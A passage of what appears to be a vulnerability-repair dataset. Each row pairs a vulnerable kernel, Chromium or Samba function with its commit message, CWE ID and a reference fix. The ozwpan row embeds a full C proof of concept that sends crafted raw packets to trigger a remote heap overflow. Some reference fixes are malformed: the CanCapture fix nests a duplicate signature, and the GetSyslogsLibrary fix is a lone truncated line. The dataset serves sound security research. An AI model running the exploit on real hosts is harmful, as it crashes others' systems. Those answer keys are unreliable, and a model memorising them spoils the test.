d->vqs[i]->log_ctx = d->log_ctx; mutex_unlock(&d->vqs[i]->mutex); } if (ctx) eventfd_ctx_put(ctx); if (filep) fput(filep); break; default: r = -ENOIOCTLCMD; break; } done: return r; } Commit Message: vhost: actually track log eventfd file While reviewing vhost log code, I found out that log_file is never set. Note: I haven't tested the change (QEMU doesn't use LOG_FD yet). Cc: stable@vger.kernel.org Signed-off-by: Marc-André Lureau <marcandre.lureau@redhat.com> Signed-off-by: Michael S. Tsirkin <mst@redhat.com> CWE ID: CWE-399
long vhost_dev_ioctl(struct vhost_dev *d, unsigned int ioctl, void __user *argp) { struct file *eventfp, *filep = NULL; struct eventfd_ctx *ctx = NULL; u64 p; long r; int i, fd; /* If you are not the owner, you can become one */ if (ioctl == VHOST_SET_OWNER) { r = vhost_dev_set_owner(d); goto done; } /* You must be the owner to do anything else */ r = vhost_dev_check_owner(d); if (r) goto done; switch (ioctl) { case VHOST_SET_MEM_TABLE: r = vhost_set_memory(d, argp); break; case VHOST_SET_LOG_BASE: if (copy_from_user(&p, argp, sizeof p)) { r = -EFAULT; break; } if ((u64)(unsigned long)p != p) { r = -EFAULT; break; } for (i = 0; i < d->nvqs; ++i) { struct vhost_virtqueue *vq; void __user *base = (void __user *)(unsigned long)p; vq = d->vqs[i]; mutex_lock(&vq->mutex); /* If ring is inactive, will check when it's enabled. */ if (vq->private_data && !vq_log_access_ok(vq, base)) r = -EFAULT; else vq->log_base = base; mutex_unlock(&vq->mutex); } break; case VHOST_SET_LOG_FD: r = get_user(fd, (int __user *)argp); if (r < 0) break; eventfp = fd == -1 ? NULL : eventfd_fget(fd); if (IS_ERR(eventfp)) { r = PTR_ERR(eventfp); break; } if (eventfp != d->log_file) { filep = d->log_file; d->log_file = eventfp; ctx = d->log_ctx; d->log_ctx = eventfp ? eventfd_ctx_fileget(eventfp) : NULL; } else filep = eventfp; for (i = 0; i < d->nvqs; ++i) { mutex_lock(&d->vqs[i]->mutex); d->vqs[i]->log_ctx = d->log_ctx; mutex_unlock(&d->vqs[i]->mutex); } if (ctx) eventfd_ctx_put(ctx); if (filep) fput(filep); break; default: r = -ENOIOCTLCMD; break; } done: return r; }
166,591
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: static ssize_t k90_show_current_profile(struct device *dev, struct device_attribute *attr, char *buf) { int ret; struct usb_interface *usbif = to_usb_interface(dev->parent); struct usb_device *usbdev = interface_to_usbdev(usbif); int current_profile; char data[8]; ret = usb_control_msg(usbdev, usb_rcvctrlpipe(usbdev, 0), K90_REQUEST_STATUS, USB_DIR_IN | USB_TYPE_VENDOR | USB_RECIP_DEVICE, 0, 0, data, 8, USB_CTRL_SET_TIMEOUT); if (ret < 0) { dev_warn(dev, "Failed to get K90 initial state (error %d).\n", ret); return -EIO; } current_profile = data[7]; if (current_profile < 1 || current_profile > 3) { dev_warn(dev, "Read invalid current profile: %02hhx.\n", data[7]); return -EIO; } return snprintf(buf, PAGE_SIZE, "%d\n", current_profile); } Commit Message: HID: corsair: fix DMA buffers on stack Not all platforms support DMA to the stack, and specifically since v4.9 this is no longer supported on x86 with VMAP_STACK either. Note that the macro-mode buffer was larger than necessary. Fixes: 6f78193ee9ea ("HID: corsair: Add Corsair Vengeance K90 driver") Cc: stable <stable@vger.kernel.org> Signed-off-by: Johan Hovold <johan@kernel.org> Signed-off-by: Jiri Kosina <jkosina@suse.cz> CWE ID: CWE-119
static ssize_t k90_show_current_profile(struct device *dev, struct device_attribute *attr, char *buf) { int ret; struct usb_interface *usbif = to_usb_interface(dev->parent); struct usb_device *usbdev = interface_to_usbdev(usbif); int current_profile; char *data; data = kmalloc(8, GFP_KERNEL); if (!data) return -ENOMEM; ret = usb_control_msg(usbdev, usb_rcvctrlpipe(usbdev, 0), K90_REQUEST_STATUS, USB_DIR_IN | USB_TYPE_VENDOR | USB_RECIP_DEVICE, 0, 0, data, 8, USB_CTRL_SET_TIMEOUT); if (ret < 0) { dev_warn(dev, "Failed to get K90 initial state (error %d).\n", ret); ret = -EIO; goto out; } current_profile = data[7]; if (current_profile < 1 || current_profile > 3) { dev_warn(dev, "Read invalid current profile: %02hhx.\n", data[7]); ret = -EIO; goto out; } ret = snprintf(buf, PAGE_SIZE, "%d\n", current_profile); out: kfree(data); return ret; }
168,394
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void SecureProxyChecker::CheckIfSecureProxyIsAllowed( SecureProxyCheckerCallback fetcher_callback) { net::NetworkTrafficAnnotationTag traffic_annotation = net::DefineNetworkTrafficAnnotation( "data_reduction_proxy_secure_proxy_check", R"( semantics { sender: "Data Reduction Proxy" description: "Sends a request to the Data Reduction Proxy server. Proceeds " "with using a secure connection to the proxy only if the " "response is not blocked or modified by an intermediary." trigger: "A request can be sent whenever the browser is determining how " "to configure its connection to the data reduction proxy. This " "happens on startup and network changes." data: "A specific URL, not related to user data." destination: GOOGLE_OWNED_SERVICE } policy { cookies_allowed: NO setting: "Users can control Data Saver on Android via the 'Data Saver' " "setting. Data Saver is not available on iOS, and on desktop " "it is enabled by installing the Data Saver extension." policy_exception_justification: "Not implemented." })"); auto resource_request = std::make_unique<network::ResourceRequest>(); resource_request->url = params::GetSecureProxyCheckURL(); resource_request->load_flags = net::LOAD_DISABLE_CACHE | net::LOAD_BYPASS_PROXY; resource_request->allow_credentials = false; url_loader_ = network::SimpleURLLoader::Create(std::move(resource_request), traffic_annotation); static const int kMaxRetries = 5; url_loader_->SetRetryOptions( kMaxRetries, network::SimpleURLLoader::RETRY_ON_NETWORK_CHANGE | network::SimpleURLLoader::RETRY_ON_5XX); url_loader_->SetOnRedirectCallback(base::BindRepeating( &SecureProxyChecker::OnURLLoaderRedirect, base::Unretained(this))); fetcher_callback_ = fetcher_callback; secure_proxy_check_start_time_ = base::Time::Now(); url_loader_->DownloadToStringOfUnboundedSizeUntilCrashAndDie( url_loader_factory_.get(), base::BindOnce(&SecureProxyChecker::OnURLLoadComplete, base::Unretained(this))); } Commit Message: Disable all DRP URL fetches when holdback is enabled Disable secure proxy checker, warmup url fetcher and client config fetch when the client is in DRP (Data Reduction Proxy) holdback. This CL does not disable pingbacks when client is in the holdback, but the pingback code is going away soon. Change-Id: Icbb59d814d1452123869c609e0770d1439c1db51 Bug: 984964 Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1709965 Commit-Queue: Tarun Bansal <tbansal@chromium.org> Reviewed-by: Robert Ogden <robertogden@chromium.org> Cr-Commit-Position: refs/heads/master@{#679649} CWE ID: CWE-416
void SecureProxyChecker::CheckIfSecureProxyIsAllowed( SecureProxyCheckerCallback fetcher_callback) { DCHECK(!params::IsIncludedInHoldbackFieldTrial()); net::NetworkTrafficAnnotationTag traffic_annotation = net::DefineNetworkTrafficAnnotation( "data_reduction_proxy_secure_proxy_check", R"( semantics { sender: "Data Reduction Proxy" description: "Sends a request to the Data Reduction Proxy server. Proceeds " "with using a secure connection to the proxy only if the " "response is not blocked or modified by an intermediary." trigger: "A request can be sent whenever the browser is determining how " "to configure its connection to the data reduction proxy. This " "happens on startup and network changes." data: "A specific URL, not related to user data." destination: GOOGLE_OWNED_SERVICE } policy { cookies_allowed: NO setting: "Users can control Data Saver on Android via the 'Data Saver' " "setting. Data Saver is not available on iOS, and on desktop " "it is enabled by installing the Data Saver extension." policy_exception_justification: "Not implemented." })"); auto resource_request = std::make_unique<network::ResourceRequest>(); resource_request->url = params::GetSecureProxyCheckURL(); resource_request->load_flags = net::LOAD_DISABLE_CACHE | net::LOAD_BYPASS_PROXY; resource_request->allow_credentials = false; url_loader_ = network::SimpleURLLoader::Create(std::move(resource_request), traffic_annotation); static const int kMaxRetries = 5; url_loader_->SetRetryOptions( kMaxRetries, network::SimpleURLLoader::RETRY_ON_NETWORK_CHANGE | network::SimpleURLLoader::RETRY_ON_5XX); url_loader_->SetOnRedirectCallback(base::BindRepeating( &SecureProxyChecker::OnURLLoaderRedirect, base::Unretained(this))); fetcher_callback_ = fetcher_callback; secure_proxy_check_start_time_ = base::Time::Now(); url_loader_->DownloadToStringOfUnboundedSizeUntilCrashAndDie( url_loader_factory_.get(), base::BindOnce(&SecureProxyChecker::OnURLLoadComplete, base::Unretained(this))); }
172,422
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: struct snd_seq_client_port *snd_seq_create_port(struct snd_seq_client *client, int port) { unsigned long flags; struct snd_seq_client_port *new_port, *p; int num = -1; /* sanity check */ if (snd_BUG_ON(!client)) return NULL; if (client->num_ports >= SNDRV_SEQ_MAX_PORTS) { pr_warn("ALSA: seq: too many ports for client %d\n", client->number); return NULL; } /* create a new port */ new_port = kzalloc(sizeof(*new_port), GFP_KERNEL); if (!new_port) return NULL; /* failure, out of memory */ /* init port data */ new_port->addr.client = client->number; new_port->addr.port = -1; new_port->owner = THIS_MODULE; sprintf(new_port->name, "port-%d", num); snd_use_lock_init(&new_port->use_lock); port_subs_info_init(&new_port->c_src); port_subs_info_init(&new_port->c_dest); num = port >= 0 ? port : 0; mutex_lock(&client->ports_mutex); write_lock_irqsave(&client->ports_lock, flags); list_for_each_entry(p, &client->ports_list_head, list) { if (p->addr.port > num) break; if (port < 0) /* auto-probe mode */ num = p->addr.port + 1; } /* insert the new port */ list_add_tail(&new_port->list, &p->list); client->num_ports++; new_port->addr.port = num; /* store the port number in the port */ write_unlock_irqrestore(&client->ports_lock, flags); mutex_unlock(&client->ports_mutex); sprintf(new_port->name, "port-%d", num); return new_port; } Commit Message: ALSA: seq: Fix use-after-free at creating a port There is a potential race window opened at creating and deleting a port via ioctl, as spotted by fuzzing. snd_seq_create_port() creates a port object and returns its pointer, but it doesn't take the refcount, thus it can be deleted immediately by another thread. Meanwhile, snd_seq_ioctl_create_port() still calls the function snd_seq_system_client_ev_port_start() with the created port object that is being deleted, and this triggers use-after-free like: BUG: KASAN: use-after-free in snd_seq_ioctl_create_port+0x504/0x630 [snd_seq] at addr ffff8801f2241cb1 ============================================================================= BUG kmalloc-512 (Tainted: G B ): kasan: bad access detected ----------------------------------------------------------------------------- INFO: Allocated in snd_seq_create_port+0x94/0x9b0 [snd_seq] age=1 cpu=3 pid=4511 ___slab_alloc+0x425/0x460 __slab_alloc+0x20/0x40 kmem_cache_alloc_trace+0x150/0x190 snd_seq_create_port+0x94/0x9b0 [snd_seq] snd_seq_ioctl_create_port+0xd1/0x630 [snd_seq] snd_seq_do_ioctl+0x11c/0x190 [snd_seq] snd_seq_ioctl+0x40/0x80 [snd_seq] do_vfs_ioctl+0x54b/0xda0 SyS_ioctl+0x79/0x90 entry_SYSCALL_64_fastpath+0x16/0x75 INFO: Freed in port_delete+0x136/0x1a0 [snd_seq] age=1 cpu=2 pid=4717 __slab_free+0x204/0x310 kfree+0x15f/0x180 port_delete+0x136/0x1a0 [snd_seq] snd_seq_delete_port+0x235/0x350 [snd_seq] snd_seq_ioctl_delete_port+0xc8/0x180 [snd_seq] snd_seq_do_ioctl+0x11c/0x190 [snd_seq] snd_seq_ioctl+0x40/0x80 [snd_seq] do_vfs_ioctl+0x54b/0xda0 SyS_ioctl+0x79/0x90 entry_SYSCALL_64_fastpath+0x16/0x75 Call Trace: [<ffffffff81b03781>] dump_stack+0x63/0x82 [<ffffffff81531b3b>] print_trailer+0xfb/0x160 [<ffffffff81536db4>] object_err+0x34/0x40 [<ffffffff815392d3>] kasan_report.part.2+0x223/0x520 [<ffffffffa07aadf4>] ? snd_seq_ioctl_create_port+0x504/0x630 [snd_seq] [<ffffffff815395fe>] __asan_report_load1_noabort+0x2e/0x30 [<ffffffffa07aadf4>] snd_seq_ioctl_create_port+0x504/0x630 [snd_seq] [<ffffffffa07aa8f0>] ? snd_seq_ioctl_delete_port+0x180/0x180 [snd_seq] [<ffffffff8136be50>] ? taskstats_exit+0xbc0/0xbc0 [<ffffffffa07abc5c>] snd_seq_do_ioctl+0x11c/0x190 [snd_seq] [<ffffffffa07abd10>] snd_seq_ioctl+0x40/0x80 [snd_seq] [<ffffffff8136d433>] ? acct_account_cputime+0x63/0x80 [<ffffffff815b515b>] do_vfs_ioctl+0x54b/0xda0 ..... We may fix this in a few different ways, and in this patch, it's fixed simply by taking the refcount properly at snd_seq_create_port() and letting the caller unref the object after use. Also, there is another potential use-after-free by sprintf() call in snd_seq_create_port(), and this is moved inside the lock. This fix covers CVE-2017-15265. Reported-and-tested-by: Michael23 Yu <ycqzsy@gmail.com> Suggested-by: Linus Torvalds <torvalds@linux-foundation.org> Cc: <stable@vger.kernel.org> Signed-off-by: Takashi Iwai <tiwai@suse.de> CWE ID: CWE-416
struct snd_seq_client_port *snd_seq_create_port(struct snd_seq_client *client, int port) { unsigned long flags; struct snd_seq_client_port *new_port, *p; int num = -1; /* sanity check */ if (snd_BUG_ON(!client)) return NULL; if (client->num_ports >= SNDRV_SEQ_MAX_PORTS) { pr_warn("ALSA: seq: too many ports for client %d\n", client->number); return NULL; } /* create a new port */ new_port = kzalloc(sizeof(*new_port), GFP_KERNEL); if (!new_port) return NULL; /* failure, out of memory */ /* init port data */ new_port->addr.client = client->number; new_port->addr.port = -1; new_port->owner = THIS_MODULE; sprintf(new_port->name, "port-%d", num); snd_use_lock_init(&new_port->use_lock); port_subs_info_init(&new_port->c_src); port_subs_info_init(&new_port->c_dest); snd_use_lock_use(&new_port->use_lock); num = port >= 0 ? port : 0; mutex_lock(&client->ports_mutex); write_lock_irqsave(&client->ports_lock, flags); list_for_each_entry(p, &client->ports_list_head, list) { if (p->addr.port > num) break; if (port < 0) /* auto-probe mode */ num = p->addr.port + 1; } /* insert the new port */ list_add_tail(&new_port->list, &p->list); client->num_ports++; new_port->addr.port = num; /* store the port number in the port */ sprintf(new_port->name, "port-%d", num); write_unlock_irqrestore(&client->ports_lock, flags); mutex_unlock(&client->ports_mutex); return new_port; }
167,729
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void oz_usb_rx(struct oz_pd *pd, struct oz_elt *elt) { struct oz_usb_hdr *usb_hdr = (struct oz_usb_hdr *)(elt + 1); struct oz_usb_ctx *usb_ctx; spin_lock_bh(&pd->app_lock[OZ_APPID_USB]); usb_ctx = (struct oz_usb_ctx *)pd->app_ctx[OZ_APPID_USB]; if (usb_ctx) oz_usb_get(usb_ctx); spin_unlock_bh(&pd->app_lock[OZ_APPID_USB]); if (usb_ctx == NULL) return; /* Context has gone so nothing to do. */ if (usb_ctx->stopped) goto done; /* If sequence number is non-zero then check it is not a duplicate. * Zero sequence numbers are always accepted. */ if (usb_hdr->elt_seq_num != 0) { if (((usb_ctx->rx_seq_num - usb_hdr->elt_seq_num) & 0x80) == 0) /* Reject duplicate element. */ goto done; } usb_ctx->rx_seq_num = usb_hdr->elt_seq_num; switch (usb_hdr->type) { case OZ_GET_DESC_RSP: { struct oz_get_desc_rsp *body = (struct oz_get_desc_rsp *)usb_hdr; int data_len = elt->length - sizeof(struct oz_get_desc_rsp) + 1; u16 offs = le16_to_cpu(get_unaligned(&body->offset)); u16 total_size = le16_to_cpu(get_unaligned(&body->total_size)); oz_dbg(ON, "USB_REQ_GET_DESCRIPTOR - cnf\n"); oz_hcd_get_desc_cnf(usb_ctx->hport, body->req_id, body->rcode, body->data, data_len, offs, total_size); } break; case OZ_SET_CONFIG_RSP: { struct oz_set_config_rsp *body = (struct oz_set_config_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, NULL, 0); } break; case OZ_SET_INTERFACE_RSP: { struct oz_set_interface_rsp *body = (struct oz_set_interface_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, NULL, 0); } break; case OZ_VENDOR_CLASS_RSP: { struct oz_vendor_class_rsp *body = (struct oz_vendor_class_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, body->data, elt->length- sizeof(struct oz_vendor_class_rsp)+1); } break; case OZ_USB_ENDPOINT_DATA: oz_usb_handle_ep_data(usb_ctx, usb_hdr, elt->length); break; } done: oz_usb_put(usb_ctx); } Commit Message: ozwpan: Use proper check to prevent heap overflow Since elt->length is a u8, we can make this variable a u8. Then we can do proper bounds checking more easily. Without this, a potentially negative value is passed to the memcpy inside oz_hcd_get_desc_cnf, resulting in a remotely exploitable heap overflow with network supplied data. This could result in remote code execution. A PoC which obtains DoS follows below. It requires the ozprotocol.h file from this module. =-=-=-=-=-= #include <arpa/inet.h> #include <linux/if_packet.h> #include <net/if.h> #include <netinet/ether.h> #include <stdio.h> #include <string.h> #include <stdlib.h> #include <endian.h> #include <sys/ioctl.h> #include <sys/socket.h> #define u8 uint8_t #define u16 uint16_t #define u32 uint32_t #define __packed __attribute__((__packed__)) #include "ozprotocol.h" static int hex2num(char c) { if (c >= '0' && c <= '9') return c - '0'; if (c >= 'a' && c <= 'f') return c - 'a' + 10; if (c >= 'A' && c <= 'F') return c - 'A' + 10; return -1; } static int hwaddr_aton(const char *txt, uint8_t *addr) { int i; for (i = 0; i < 6; i++) { int a, b; a = hex2num(*txt++); if (a < 0) return -1; b = hex2num(*txt++); if (b < 0) return -1; *addr++ = (a << 4) | b; if (i < 5 && *txt++ != ':') return -1; } return 0; } int main(int argc, char *argv[]) { if (argc < 3) { fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]); return 1; } uint8_t dest_mac[6]; if (hwaddr_aton(argv[2], dest_mac)) { fprintf(stderr, "Invalid mac address.\n"); return 1; } int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW); if (sockfd < 0) { perror("socket"); return 1; } struct ifreq if_idx; int interface_index; strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) { perror("SIOCGIFINDEX"); return 1; } interface_index = if_idx.ifr_ifindex; if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) { perror("SIOCGIFHWADDR"); return 1; } uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_elt_connect_req oz_elt_connect_req; } __packed connect_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(0) }, .oz_elt = { .type = OZ_ELT_CONNECT_REQ, .length = sizeof(struct oz_elt_connect_req) }, .oz_elt_connect_req = { .mode = 0, .resv1 = {0}, .pd_info = 0, .session_id = 0, .presleep = 35, .ms_isoc_latency = 0, .host_vendor = 0, .keep_alive = 0, .apps = htole16((1 << OZ_APPID_USB) | 0x1), .max_len_div16 = 0, .ms_per_isoc = 0, .up_audio_buf = 0, .ms_per_elt = 0 } }; struct { struct ether_header ether_header; struct oz_hdr oz_hdr; struct oz_elt oz_elt; struct oz_get_desc_rsp oz_get_desc_rsp; } __packed pwn_packet = { .ether_header = { .ether_type = htons(OZ_ETHERTYPE), .ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] }, .ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }, .oz_hdr = { .control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT), .last_pkt_num = 0, .pkt_num = htole32(1) }, .oz_elt = { .type = OZ_ELT_APP_DATA, .length = sizeof(struct oz_get_desc_rsp) - 2 }, .oz_get_desc_rsp = { .app_id = OZ_APPID_USB, .elt_seq_num = 0, .type = OZ_GET_DESC_RSP, .req_id = 0, .offset = htole16(0), .total_size = htole16(0), .rcode = 0, .data = {0} } }; struct sockaddr_ll socket_address = { .sll_ifindex = interface_index, .sll_halen = ETH_ALEN, .sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] } }; if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } usleep(300000); if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) { perror("sendto"); return 1; } return 0; } Signed-off-by: Jason A. Donenfeld <Jason@zx2c4.com> Acked-by: Dan Carpenter <dan.carpenter@oracle.com> Cc: stable <stable@vger.kernel.org> Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org> CWE ID: CWE-119
void oz_usb_rx(struct oz_pd *pd, struct oz_elt *elt) { struct oz_usb_hdr *usb_hdr = (struct oz_usb_hdr *)(elt + 1); struct oz_usb_ctx *usb_ctx; spin_lock_bh(&pd->app_lock[OZ_APPID_USB]); usb_ctx = (struct oz_usb_ctx *)pd->app_ctx[OZ_APPID_USB]; if (usb_ctx) oz_usb_get(usb_ctx); spin_unlock_bh(&pd->app_lock[OZ_APPID_USB]); if (usb_ctx == NULL) return; /* Context has gone so nothing to do. */ if (usb_ctx->stopped) goto done; /* If sequence number is non-zero then check it is not a duplicate. * Zero sequence numbers are always accepted. */ if (usb_hdr->elt_seq_num != 0) { if (((usb_ctx->rx_seq_num - usb_hdr->elt_seq_num) & 0x80) == 0) /* Reject duplicate element. */ goto done; } usb_ctx->rx_seq_num = usb_hdr->elt_seq_num; switch (usb_hdr->type) { case OZ_GET_DESC_RSP: { struct oz_get_desc_rsp *body = (struct oz_get_desc_rsp *)usb_hdr; u16 offs, total_size; u8 data_len; if (elt->length < sizeof(struct oz_get_desc_rsp) - 1) break; data_len = elt->length - (sizeof(struct oz_get_desc_rsp) - 1); offs = le16_to_cpu(get_unaligned(&body->offset)); total_size = le16_to_cpu(get_unaligned(&body->total_size)); oz_dbg(ON, "USB_REQ_GET_DESCRIPTOR - cnf\n"); oz_hcd_get_desc_cnf(usb_ctx->hport, body->req_id, body->rcode, body->data, data_len, offs, total_size); } break; case OZ_SET_CONFIG_RSP: { struct oz_set_config_rsp *body = (struct oz_set_config_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, NULL, 0); } break; case OZ_SET_INTERFACE_RSP: { struct oz_set_interface_rsp *body = (struct oz_set_interface_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, NULL, 0); } break; case OZ_VENDOR_CLASS_RSP: { struct oz_vendor_class_rsp *body = (struct oz_vendor_class_rsp *)usb_hdr; oz_hcd_control_cnf(usb_ctx->hport, body->req_id, body->rcode, body->data, elt->length- sizeof(struct oz_vendor_class_rsp)+1); } break; case OZ_USB_ENDPOINT_DATA: oz_usb_handle_ep_data(usb_ctx, usb_hdr, elt->length); break; } done: oz_usb_put(usb_ctx); }
166,618
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: bool CanCapture(const Extension& extension, const GURL& url) { return extension.permissions_data()->CanCaptureVisiblePage( url, kTabId, nullptr /*error*/); } Commit Message: Call CanCaptureVisiblePage in page capture API. Currently the pageCapture permission allows access to arbitrary local files and chrome:// pages which can be a security concern. In order to address this, the page capture API needs to be changed similar to the captureVisibleTab API. The API will now only allow extensions to capture otherwise-restricted URLs if the user has granted activeTab. In addition, file:// URLs are only capturable with the "Allow on file URLs" option enabled. Bug: 893087 Change-Id: I6d6225a3efb70fc033e2e1c031c633869afac624 Reviewed-on: https://chromium-review.googlesource.com/c/1330689 Commit-Queue: Bettina Dea <bdea@chromium.org> Reviewed-by: Devlin <rdevlin.cronin@chromium.org> Reviewed-by: Varun Khaneja <vakh@chromium.org> Cr-Commit-Position: refs/heads/master@{#615248} CWE ID: CWE-20
bool CanCapture(const Extension& extension, const GURL& url) { bool CanCapture(const Extension& extension, const GURL& url, extensions::CaptureRequirement capture_requirement) { return extension.permissions_data()->CanCaptureVisiblePage( url, kTabId, nullptr /*error*/, capture_requirement); }
173,006
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: SyslogsLibrary* CrosLibrary::GetSyslogsLibrary() { return syslogs_lib_.GetDefaultImpl(use_stub_impl_); } Commit Message: chromeos: Replace copy-and-pasted code with macros. This replaces a bunch of duplicated-per-library cros function definitions and comments. BUG=none TEST=built it Review URL: http://codereview.chromium.org/6086007 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@70070 0039d316-1c4b-4281-b951-d872f2087c98 CWE ID: CWE-189
SyslogsLibrary* CrosLibrary::GetSyslogsLibrary() {
170,631
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void ResourceDispatcherHostImpl::OnSSLCertificateError( net::URLRequest* request, const net::SSLInfo& ssl_info, bool is_hsts_host) { DCHECK(request); ResourceRequestInfoImpl* info = ResourceRequestInfoImpl::ForRequest(request); DCHECK(info); GlobalRequestID request_id(info->GetChildID(), info->GetRequestID()); int render_process_id; int render_view_id; if(!info->GetAssociatedRenderView(&render_process_id, &render_view_id)) NOTREACHED(); SSLManager::OnSSLCertificateError(ssl_delegate_weak_factory_.GetWeakPtr(), request_id, info->GetResourceType(), request->url(), render_process_id, render_view_id, ssl_info, is_hsts_host); } Commit Message: Inherits SupportsWeakPtr<T> instead of having WeakPtrFactory<T> This change refines r137676. BUG=122654 TEST=browser_test Review URL: https://chromiumcodereview.appspot.com/10332233 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@139771 0039d316-1c4b-4281-b951-d872f2087c98 CWE ID: CWE-119
void ResourceDispatcherHostImpl::OnSSLCertificateError( net::URLRequest* request, const net::SSLInfo& ssl_info, bool is_hsts_host) { DCHECK(request); ResourceRequestInfoImpl* info = ResourceRequestInfoImpl::ForRequest(request); DCHECK(info); GlobalRequestID request_id(info->GetChildID(), info->GetRequestID()); int render_process_id; int render_view_id; if(!info->GetAssociatedRenderView(&render_process_id, &render_view_id)) NOTREACHED(); SSLManager::OnSSLCertificateError( AsWeakPtr(), request_id, info->GetResourceType(), request->url(), render_process_id, render_view_id, ssl_info, is_hsts_host); }
170,989
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: static bool ldap_push_filter(struct asn1_data *data, struct ldb_parse_tree *tree) { int i; switch (tree->operation) { case LDB_OP_AND: case LDB_OP_OR: asn1_push_tag(data, ASN1_CONTEXT(tree->operation==LDB_OP_AND?0:1)); for (i=0; i<tree->u.list.num_elements; i++) { if (!ldap_push_filter(data, tree->u.list.elements[i])) { return false; } } asn1_pop_tag(data); break; case LDB_OP_NOT: asn1_push_tag(data, ASN1_CONTEXT(2)); if (!ldap_push_filter(data, tree->u.isnot.child)) { return false; } asn1_pop_tag(data); break; case LDB_OP_EQUALITY: /* equality test */ asn1_push_tag(data, ASN1_CONTEXT(3)); asn1_write_OctetString(data, tree->u.equality.attr, strlen(tree->u.equality.attr)); asn1_write_OctetString(data, tree->u.equality.value.data, tree->u.equality.value.length); asn1_pop_tag(data); break; case LDB_OP_SUBSTRING: /* SubstringFilter ::= SEQUENCE { type AttributeDescription, -- at least one must be present substrings SEQUENCE OF CHOICE { initial [0] LDAPString, any [1] LDAPString, final [2] LDAPString } } */ asn1_push_tag(data, ASN1_CONTEXT(4)); asn1_write_OctetString(data, tree->u.substring.attr, strlen(tree->u.substring.attr)); asn1_push_tag(data, ASN1_SEQUENCE(0)); if (tree->u.substring.chunks && tree->u.substring.chunks[0]) { i = 0; if (!tree->u.substring.start_with_wildcard) { asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(0)); asn1_write_DATA_BLOB_LDAPString(data, tree->u.substring.chunks[i]); asn1_pop_tag(data); i++; } while (tree->u.substring.chunks[i]) { int ctx; if (( ! tree->u.substring.chunks[i + 1]) && (tree->u.substring.end_with_wildcard == 0)) { ctx = 2; } else { ctx = 1; } asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(ctx)); asn1_write_DATA_BLOB_LDAPString(data, tree->u.substring.chunks[i]); asn1_pop_tag(data); i++; } } asn1_pop_tag(data); asn1_pop_tag(data); break; case LDB_OP_GREATER: /* greaterOrEqual test */ asn1_push_tag(data, ASN1_CONTEXT(5)); asn1_write_OctetString(data, tree->u.comparison.attr, strlen(tree->u.comparison.attr)); asn1_write_OctetString(data, tree->u.comparison.value.data, tree->u.comparison.value.length); asn1_pop_tag(data); break; case LDB_OP_LESS: /* lessOrEqual test */ asn1_push_tag(data, ASN1_CONTEXT(6)); asn1_write_OctetString(data, tree->u.comparison.attr, strlen(tree->u.comparison.attr)); asn1_write_OctetString(data, tree->u.comparison.value.data, tree->u.comparison.value.length); asn1_pop_tag(data); break; case LDB_OP_PRESENT: /* present test */ asn1_push_tag(data, ASN1_CONTEXT_SIMPLE(7)); asn1_write_LDAPString(data, tree->u.present.attr); asn1_pop_tag(data); return !data->has_error; case LDB_OP_APPROX: /* approx test */ asn1_push_tag(data, 